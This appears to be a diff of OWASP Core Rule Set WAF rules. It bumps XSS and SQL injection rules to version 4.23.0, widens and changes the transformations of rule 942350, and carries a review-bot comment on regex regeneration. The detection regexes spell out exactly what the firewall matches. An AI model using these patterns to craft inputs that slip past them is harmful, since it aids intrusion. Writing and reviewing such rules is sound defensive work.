@@ -1064,7 +1065,6 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 "id:941380,\
 phase:2,\
 block,\
- capture,\
 t:none,\
 msg:'AngularJS client side template injection detected',\
 logdata:'Matched Data: Suspicious payload found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
@@ -1076,23 +1076,23 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242/63',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # 
diff --git a/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf b/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf index 3c14d4c63f..27e76ed960 100644 --- a/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf +++ b/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -59,7 +59,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ 
@@ -90,7 +90,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -123,7 +123,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -167,7 +167,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -193,7 +193,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -219,7 +219,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -243,7 +243,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^(?i:-
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -269,7 +269,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -295,7 +295,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)al
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -316,7 +316,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:me
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -337,7 +337,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)un
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -363,7 +363,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -389,7 +389,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\[
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -418,7 +418,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)cr
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -428,12 +428,12 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)cr
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 # crs-toolchain regex update 942350
 #
-SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)create[\s\x0b]+function[\s\x0b].+[\s\x0b]returns|;[\s\x0b]*?(?:alter|(?:(?:cre|trunc|upd)at|renam)e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)\b[\s\x0b]*?[\(\[]?[0-9A-Z_a-z]{2,}" \
+SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)create[\s\x0b]+function[\s\x0b].+[\s\x0b]returns|;[\s\x0b]*?(?:alter|(?:(?:cre|trunc|upd)at|re(?:nam|plac))e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)\b[\s\x0b]*?[\(\[]?[0-9A-Z_a-z]{2,}" \
 "id:942350,\
 phase:2,\
 block,\
 capture,\
- t:none,t:urlDecodeUni,\
+ t:none,t:urlDecodeUni,t:replaceComments,\
 msg:'Detects MySQL UDF injection and other data/structure manipulation attempts',\
 logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
 tag:'application-multi',\
@@ -444,7 +444,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)cr
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -483,7 +483,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
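Review bot: The comment directly above the rule says this regex is generated by `crs-toolchain regex update 942350`, but the hunk edits only the generated output (widening `renam` to `re(?:nam|plac)`); if the regex-assembly source for 942350 was not updated in the same commit — it is not visible in this chunk — the next toolchain run will silently drop `replace` again. The added `t:replaceComments` also changes the input the regex sees: ModSecurity replaces each `/* ... */` with a single space and treats an unterminated `/*` as a comment running to the end of the value, so `%{TX.0}` and `%{MATCHED_VAR}` in the log line now show the comment-stripped value rather than the raw argument. The regression tests for 942350 should pin both effects — a `;`-prefixed statement with an embedded comment as a positive case, and a legitimate value containing a bare `/*` as a negative one — since the transformation can both create and hide matches.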
@@ -524,7 +524,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)/\
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 multiMatch,\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
@@ -561,7 +561,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^(?:[^
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'paranoia-level/1',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -591,7 +591,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)1\
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -621,14 +621,14 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -661,7 +661,7 @@ SecRule ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[!=]=|&&|\|\||->|>[=>]| tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -702,7 +702,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\x0b\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.942130_matched_var_name=%{matched_var_name}',\ chain" 
@@ -738,7 +738,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\x0b\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 multiMatch,\
 setvar:'tx.942131_matched_var_name=%{matched_var_name}',\
@@ -775,7 +775,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -818,7 +818,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -847,7 +847,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -876,7 +876,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -902,7 +902,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -928,7 +928,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\)
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -954,7 +954,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -988,7 +988,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1017,7 +1017,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)in
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-SQLI',\
 tag:'capec/1000/152/248/66',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1042,7 +1042,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:^[ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1072,7 +1072,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1104,7 +1104,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:Referer|REQUEST_HE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
@@ -1114,7 +1114,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:Referer|REQUEST_HE # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 942380 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:having\b(?:[\s\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')[\s\x0b]*?[<->]| ?(?:[0-9]{1,10} ?[<->]+|[\"'][^=]{1,10}[ \"'<-\?\[]+))|ex(?:ecute(?:\(|[\s\x0b]{1,5}[\$\.0-9A-Z_a-z]{1,5}[\s\x0b]{0,3})|ists[\s\x0b]*?\([\s\x0b]*?select\b)|(?:create[\s\x0b]+?table.{0,20}?|like[^0-9A-Z_a-z]*?char[^0-9A-Z_a-z]*?)\()|select.*?case|from.*?limit|order[\s\x0b]by|exists[\s\x0b](?:[\s\x0b]select|s(?:elect[^\s\x0b](?:if(?:null)?[\s\x0b]\(|top|concat)|ystem[\s\x0b]\()|\bhaving\b[\s\x0b]+[0-9]{1,10}|'[^=]{1,10}')" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:having\b(?:[\s\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')[\s\x0b]*?[<->]| ?(?:[0-9]{1,10} ?[<->]+|[\"'][^=]{1,10}[ \"'<-\?\[]+))|ex(?:ecute(?:\(|[\s\x0b]{1,5}[\$\.0-9A-Z_a-z]{1,5}[\s\x0b]{0,3})|ists[\s\x0b]*?\([\s\x0b]*?select\b)|(?:create[\s\x0b]+?table.{0,20}?|like[^0-9A-Z_a-z]*?char[^0-9A-Z_a-z]*?)\()|select.*?case|from.*?limit|order[\s\x0b]by|exists[\s\x0b](?:[\s\x0b]select|s(?:elect[^\s\x0b](?:if(?:null)?[\s\x0b]\(|top|concat)|ystem[\s\x0b]\()|\bhaving\b[\s\x0b]+[0-9]{1,10}|'[^=]{1,10}')" \ "id:942380,\ phase:2,\ block,\ @@ -1130,7 +1130,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
